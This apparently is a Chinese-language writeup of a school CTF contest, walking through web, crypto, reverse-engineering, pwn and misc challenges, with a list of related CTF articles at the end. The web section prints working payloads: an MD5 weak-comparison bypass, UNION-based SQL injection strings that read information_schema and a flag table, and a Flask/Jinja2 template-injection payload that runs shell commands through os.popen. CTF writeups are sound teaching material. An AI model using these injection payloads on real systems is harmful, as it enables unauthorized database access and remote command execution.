Web
- 签到2
- 口算小天才
- easy php
- 录取查询
- 我爱python
Crypto
- easy crypto
- bAcOn
Re
- easy re
- 跳到对的地方
- 简单的xor
Pwn
- easy pwn
- 莽撞人
Misc
- drop the beats
- 拼东东
- 消失的50px

签到2

看源代码底部就能知道前面一段flag 在将input的size和maxlength去掉提交就可以得到下一段flag

口算小天才

在1-3秒内答题口算好可以直接做不然也可以写python脚本自动提交数据注意session的获取就行

easy php

vim写的明示有swp文件 index.php.swp 得到源码

<?php
header("content-type:text/html;charset=utf-8");
$a = @$_GET['a'];
$b = @$_GET['b'];
$c = @$_GET['c'];
$a_md5 = @md5($a);
$b_md5 = @md5($b);
if(isset($a) && isset($b)){if ($a != $b && $a_md5 == $b_md5) {if (($c<9999999999 || (string)$c>0)==false) {echo "xgctf{xxxxxxx}";}else {echo "Sorry, just think more";}} else {echo "Sorry, you are wrong";}
}
else{echo "这是第一个我用vim写的网站哦";
}
?>

三个变量 a b c.其中 a b要求值不同但md5相等可以直接用a=240610708&b=QNKCDZO相似md5过验证理论也可以传数组过验证 c既要大于9999999 又要小于0 可用数组 NULL==FALSE 交提就拿flag

录取查询

sql注入题
简单测试下发现基本没有关键词过滤直接注入就行

似乎第二个input才是执行的代码第一个仅仅只是用来填模板的所以要在下面注入

1’ or 1=1 order by 7 #可以知道有7列
1’ union select 1,2,3,4,5,user(),database() #数据库是school
1’ union select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema= ‘school’#得到table_name
1’ union select 1,2,3,4,5,6,flag from flag #猜测字段名是flag即可

我爱python

网页源码提示是用来flask的也没有关键词过滤可以直接执行系统命令

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("ls").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}

看到有flag这个文件 cat之后得到flag

easy crypto

a3RwZ3N7b25mcl82NF9uYXFfZTBnXzEzfQ==
base64解密后 ktpgs{onfr_64_naq_e0g_13} 像是flag 但flag是xgctf开头的
ktpgs和xgctf每个单词相差13或-13 所以枚举每个位置单词的所有可能然后凭感觉组合(#^.#)

bAcOn

如题是培根加密大写字母1小写字母0 然后在http://rumkin.com/tools/cipher/baconian.php解密就行

easy re

拖OD搜中文
解密这一串字符就可以

跳到对的地方

搜中文后可以看到提示
直接jmp到段首然后跟到段尾 flag就出现了

简单的xor

拖OD找到关键句所以要分析算法
那就去IDA F5
分析可知输入的每个字符跟v10开始的数组进行异或再跟v32比较相等就正确输入的就是flag
因为异或在异或就是本来的数据所以只要v32跟v10数组再次异或就OK

easy pwn

这是main函数 linux的ida似乎没有F5？TOT
这道题主要是让输入的buf覆盖var4的值所以我们需要C-4个字母加上7E3就可以骗到flag

莽撞人

跟上面的有点不同这是让我们用栈溢出来执行CALL
这是我们的目标地址是 08048466
也就是让给EBP这个值参考https://www.jianshu.com/p/7f18c0db8e68
用peda可以算出溢出值 20
代码：

drop the beats

音频隐写刚好我电脑装了Au 随便看几个音频参数就可以发现flag在这里

拼东东

zip损坏在压缩包头部补上文件头即可

消失的50px

题目给了提示要求高度补上50px
将修改为190可以看到flag

校内CTF比赛WriteUp相关推荐

“百度杯”CTF比赛十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝我要变成一只程序员剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题泄露的数据考眼 ...
ctf比赛/学习资源整理，记得收藏！
最近CTF比赛很多,对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具首先给大家推荐我自己常用的3个CT ...
5月全球CTF比赛时间汇总来了！
● 5月全球CTF比赛时间汇总来了! ● 从事网络安全行业工作,怎么能不参加一次CTF比赛了! 小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣! 下面给大家分享一下5月份CTF比赛时间,比赛按时 ...
网络安全ctf比赛/学习资源整理，解题工具、比赛时间、解题思路、实战靶场、学习路线，推荐收藏！...
对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容 ...
论学生/战队/社团如何举办CTF比赛
说在前面: 本人一名在校菜鸡,磕磕绊绊的办了一次ctf比赛,希望接下来的东西可以帮到你,说的不对的地方,请多多指点.11月份中旬比赛,以此为例 9月上旬确定公文.搞清举办比赛的主办方,你是想以自己战队 ...
2月国内外CTF比赛时间汇总来了！
● 从事网络安全行业工作,怎么能不参加一次CTF比赛了! 小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣! 下面给大家分享一下2月份CTF比赛时间,比赛按时间先后排序,国内国外的都有哦! 文章末 ...
第五空间CTF初赛WriteUp By EDISEC
第五空间CTF初赛WriteUp By EDISEC Web 5_web_Eeeeasy_SQL 5_web_BaliYun 5_easylogin 5_web_letmeguess_1 Misc s ...
如何开始你的CTF比赛之旅
在过去的两个星期里,我已经在DEFCON 22 CTF里检测出了两个不同的问题:"shitsco"和"nonameyet".感谢所有的意见和评论,我遇到的最常见 ...
php定时执行代码漏洞_在CTF比赛中发现的PHP远程代码执行0day漏洞
众所周知,CTF比赛都是人为构造漏洞环境,人为制造安全漏洞,供安全从爱好者研究,好磨练和增强自己的安全技能. 参加CTF比赛,通常你需要明白出题人的想法,按照出题人的意图来解开谜题. 但是,就像所有的 ...

校内CTF比赛WriteUp

签到2